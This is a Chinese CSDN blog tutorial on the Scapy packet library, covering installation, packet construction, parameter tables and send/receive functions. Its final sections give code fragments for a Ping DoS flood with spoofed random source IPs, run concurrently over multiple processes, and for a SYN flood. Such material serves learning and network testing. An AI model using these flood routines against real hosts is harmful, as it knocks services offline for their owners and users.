Scapy功能介绍以及应用

最新推荐文章于 2024-01-24 20:50:57 发布
最新推荐文章于 2024-01-24 20:50:57 发布
阅读量1.3k 收藏 11
点赞数 1
分类专栏: 工具 文章标签: python 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45969062/article/details/114809137
版权

介绍

  • 首先给出官网
  • Scapy是用Python编写的交互式数据包处理工具。
  • 使用Scapy可以伪造或解码各种协议的数据包,在线发送它们,捕获它们,匹配请求和答复等等。

下载

  • 由于是Python编写的,使用pip install进行安装,这里使用清华源加速。
pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple
  • 直接使用scapy命令打开,若显示无法导入相关库,则对其中缺失的相关包进行安装。
INFO: Can't import matplotlib. Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().

使用

包配置

  • 使用TCP/IP协议构造基本数据包,这里调用了Scapy的内置函数IP()TCP()
pkt = IP()/TCP()

注意IP()一定在TCP()之前。

IP()参数解析

参数含义默认值
version版本4
ihl报头长度None
tos服务类型0x0
len报文总长度None
id标识符1
flags标记NULL
frag段偏移0
ttl生存周期64
proto协议tcp
chksum校验和None
srcIP地址127.0.0.1
dst目的IP地址127.0.0.1

TCP()参数解析

参数含义默认值
sport源端口ftp_data
dport目的端口http
seq序号0
ack确认号0
dataofs数据偏移None
reserved保留位0
flags控制功能S
window窗口大小8192
chksum校验和None
urgptr紧急指针0
options选项[]
  • 根据需求设置数据包之后,使用{PKT_NAME}.show()可以查看报文信息。
###[ IP ]### 
  version= 4
  ihl= None
  tos= 0x0
  len= None
  id= 1
  flags= 
  frag= 0
  ttl= 64
  proto= tcp
  chksum= None
  src= 192.168.239.128
  dst= 110.242.68.4
  \options\
###[ TCP ]### 
     sport= ftp_data
     dport= http
     seq= 0
     ack= 0
     dataofs= None
     reserved= 0
     flags= S
     window= 8192
     chksum= None
     urgptr= 0
     options= []

包发送

  • 使用send()函数发送数据包,该函数不返回响应。
>>> send(pkt)
.
Sent 1 packets.

sendp()等加了p的函数作用于第二层,发送的是帧。

  • sr()sr1()发送数据包并接收响应。
>>> res, unans = sr(pkt)
Begin emission:
Finished sending 1 packets.
*
Received 1 packets, got 1 answers, remaining 0 packets
>>> res
<Results: TCP:1 UDP:0 ICMP:0 Other:0>
>>> unans
<Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>

sr()sr1()的区别在于,sr1()只有一个返回值(Results)。

Ping DoS

  • 使用Ping进行DoS攻击时,由于Ping使用的是ICMP协议,下面给出ICMP()的参数解析。

ICMP()参数解析

参数含义默认值
type消息类型echo-request
code代码0
chksum校验和None
id标识0x0
seq序号0x0
  • Ping攻击报文的设置比较简单,通过随机配置ICMP()也能实现Ping DoS的攻击效果。
  • 结合IP()设置目标主机IP
#判断是否随机源
if random_source ==True:
    #随机构造IP
    source_ip = Random_IP()

    ip_proto = IP(src = source_ip,
                  dst = host,
                  ttl = 1,
                  id = id_ip)
else:
    ip_proto = IP(dst = host,
                  ttl = 1,
                  id = id_ip)
	#id_ping和seq_ping均为随机配置
    icmp_proto = ICMP(id = id_ping,
                      seq = seq_ping)
    #设置数据内容
    data = b'ping dos'
	
    pkt = ip_proto / icmp_proto / data *100
    send(pkt)
  • 在这基础上,要想达到效果,我们需要增加攻击报文的量。
  • 通过循环重复攻击之外,我们采用多进程并发的方式增大攻击频率。
#processes设置太高会影响本机运作,太低起不到干扰效果
def ping_concurrent(host, processes=5, random_source=True):
    #创建进程池
    pool = multiprocessing.Pool(processes=processes)
    while True:
        try:
            #选择进程的任务和参数
            pool.apply_async(ping_times, (host, random_source))
        except KeyboardInterrupt:
            pool.terminate()

SYN_Flood

  • 多进程和重复次数的性质和Ping DoS一致,这里主要的区别在于把ICMP协议换成了TCP协议。
# Randomly generate source port
src_port = randint(1,65535)

tcp_proto = TCP(sport = src_port,
                dport = port,
                flags = "S")

pkt = ip_proto / tcp_proto
  • 其中flags变量表示了TCP三次握手的不同状态,S表示SYN
ch3uhx9
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Scapy网络数据包修改工具
07-25
综上所述,"Scapy网络数据包修改工具"利用了Scapy的强大功能,提供了一种便捷的方式,用于创建、解析和修改各种网络协议报文,特别是在处理EDIG以及OT环境中的协议时,它显得尤为有用。无论你是网络管理员、安全研究...
Scapy 介绍
海纳百川
08-09 3667
简介 **Scapy **是一种用于计算机网络的数据包处理工具,由 Philippe Biondi 用 Python 编写。它可以伪造或解码数据包,通过网络发送它们,捕获它们,并匹配请求和响应。它还可以用于处理扫描、跟踪路由、探测、单元测试、攻击和网络发现等任务。 Scapy 为 libpcap(Windows 上是 WinPCap/Npcap)提供了一个Python接口,与 Wireshark 提供视图和捕获GUI的方式类似。它可以与许多其他程序接口来提供可视化,包括用于解码数据包的 Wireshark
数据包工具--Scapy基础篇
枫零NET的博客,分享一些自己喜欢的技术
06-09 7573
零、前言 学习过程中用到Scapy这个工具,用了一些小功能之后发现效果挺好的,自由度高,比其他的很多工具的可自定义程度要高太多了,所以写一篇Scapy基础篇分享给各位,希望能对各位有用。
Python渗透测试——一、数据包的编辑工具——Scapy
热门推荐
钟言的博客
12-09 1万+
本篇为Python渗透测试的第一篇,数据包的编辑工具,Scapy,详细内容包含了:Scapy简介 Scapy中的分层结构Scapy中的常用函数四、在Scapy 中发送和接收数据包五、Scapy 中的抓包函数等等
Scapy的基本操作
qq_45887590的博客
03-09 1万+
Scapy模块的使用Scapy的基本操作Scapy模块中的函数利用Scapy进行端口屏蔽探测 Scapy的基本操作 1.IP()类型数据包 在Scapy中,每一个协议就是一个类。只需要实例化一个协议类,就可以创建一个该协议的数据包。例如,如果要创建一个IP类型的数据包,就可以使用如下命令。 ip = IP() ip.show() 运行结果: IP数据包最重要的属性就是源地址和目的地址,这两个属性可以使用src和dst来设置。 例如,要构造一个发送“192.168.43.1”的IP数据包,可以使用下面
Python Scapy 详解
weixin_42660646的博客
08-07 2166
Scapy是一个功能强大且灵活的Python库,用于操作和探索计算机网络中的数据包。它允许用户构建各种类型的网络数据包,并支持多种网络协议,如TCP、UDP、ICMP、ARP等。Scapy不仅可以发送和接收数据包,还可以捕获、修改和解析网络流量,使用户能够深入研究网络通信并进行网络安全测试。
Python】构造数据包Scapy——网络扫描、攻击工具
weixin_55205599的博客
07-29 2666
是库(在Python中),独立运行的工具(在Linux中,提供了一个和Python相同的交互式命令行环境)。可以在自己程序中实现对网络数据包的发送、监听、解析,构建能够进行探测、扫描、攻击的网络工具。Scapy是可以直接操作到数据包层次的工具,可以构造符合自己的数据包。在kali中,命令:scapy,可以启动Scapy编程环境。目前很多网络扫描、攻击工具都用了这个库。
python_scapy
03-17
在实际应用中,"python_scapy"项目可能涵盖了如何使用Scapy创建自定义的网络工具,如抓包工具、DNS查询工具,或者网络漏洞探测器等。这些工具可以帮助网络安全专业人员进行网络审计、漏洞评估和故障排除。 总之,...
python scapy模块
01-03
下面我们将深入探讨Scapy功能、用法以及一些常见应用。 首先,Scapy能够处理各种网络层协议,包括但不限于IP、TCP、UDP、ICMP等,甚至支持更底层的链路层协议如Ethernet和ARP。通过Scapy,你可以构建自定义的...
anaconda-scapy
02-21
它是由Ecole Nationale Supérieure des Télécommunications de Bretagne (ENST)开发的,并且广泛应用网络安全、网络诊断、协议开发等领域。标题“anaconda-scapy”暗示我们将讨论如何在Anaconda环境中安装和...
pythonscapy.zip
03-30
这个库允许用户创建、读取、修改、发送以及嗅探网络数据包,覆盖了众多的网络协议,从底层的链路层到高层的应用层。通过Scapy,开发者可以轻松实现对网络流量的深度控制和分析,对于网络测试、安全研究以及故障排查...
“人生苦短,我用Python“——Socket、Nmap、Scapy
weixin_42902126的博客
10-20 1164
这里需要IP()和TCP()来产生所需要的数据包,sr()函数来发送,然后发送构造好的数据包,在Python交互式命令行中(还是在kali Scapy中)执行这个程序。例如,对192.168.1.102的21、23、135、443、445五个端口是否被屏蔽进行扫描,注意是屏蔽不是关闭,采用ACK扫描模式,可以构造如下命令方式:ans,unans=sr(IP(dst=“192.168.1.102”)/TCP(dport=[21,23,135,443,445],flags=“A”))而srp()用于第二层。
Python渗透测试之Scapy模块&情报收集
waqqy的博客
04-25 4015
Scapy模块文件 关于Scapy Scapy是一个由Python语言编写的强大工具,它是大量程序编写人员最喜爱的一个网络模块。 也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。 这个模块相比起Nmap来说,更为底层。可以更为直观地了解到网络中的各种扫描和攻击行为,例如,要检测某一个端口是否开放,只需提供给Nmap一个端口号,而Nmap就会给出一个开放或者关闭的结果,但是并不知道Nmap是怎么做的。 如果想对网络中的各种问题进行深入研究,Scapy无疑是一个更好的选择,可以利用它来产
Python 使用Scapy构造特殊数据包
CSDN
11-06 1万+
Scapy是一款Python库,可用于构建、发送、接收和解析网络数据包。除了实现端口扫描外,它还可以用于实现各种网络安全工具,例如`SynFlood`攻击,`Sockstress`攻击,`DNS`查询攻击,`ARP`攻击,`ARP`中间人等。这些工具都是基于构造、发送和解析网络数据包来实现的,可以用于模拟各种网络攻击,测试网络安全防御措施等。Scapy网络安全领域中非常有用的工具之一。
scapy基本操作
uno的博客
05-11 1758
scapy基本操作 scapy是一款基于Python强大的数据包处理工具。它可以用来发送各类定制的数据包也可以用于数据包解析。 由于毕业论文需要对数据包进行预处理(数据清洗,数据归一化等),使用scapy进行数据处理。 本文是scapy学习过程中使用到的基本操作总结。安装及验证参考官网即可 参考资源: 官网:https://scapy.net/ 官方文档:https://scapy.readthedocs.io/en/latest/index.html 其他: 使用scapy向数据包添加以太网填充 使用S
CENTOS上的网络安全工具(八)Scapy协议解析
lhyzws的专栏
08-10 3170
以DNS为例,简述基于scapy解析pcap文件,提取协议元数据,并在pymysql和pandas配合下,使用mysql进行数据管理和检索使用的方法。
Scapy:交互式数据包处理程序
41634454的博客
05-10 2037
python数据包处理库——scapy
Scapy编程指南(基础概念)
最新发布
diaobusi的博客
01-24 1508
Scapy 是一款功能强大的网络工具库,具有灵活性和广泛的协议支持。它提供了丰富的功能,让用户能够直观地操作网络数据包,进行网络分析和实验。
PythonScapy使用方法,模块中的常用函数,简单的端口扫描编写
sGanYu
07-08 1万+
目录scapy是什么scapy的使用IP()src()和dst()Ether()采用分层的方式来构造数据包raw()和hexdump()summary()和show()如何在scapy中发送和接收数据包send()和sendp()sr()、sr1()和srp()简单的端口扫描sniff()使用scapy编写简单的端口扫描scapy是一个可用作网络嗅探,独立运行的工具,它提供了一个和python相同的交互方式命令行环境,可以在kali内单独运行,该类库在网络安全领域有非常广泛用例,可用于漏洞利用开发、流量的分
python scapy
08-08
Scapy是一个在Python...Scapy提供了方便的工具,尤其在需要修改IP和构造UDP报文并进行大量发送时(如性能测试)非常有用。因此,如果你需要进行网络数据包的构造、发送、嗅探或解析,Scapy是一个非常有用的Python库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值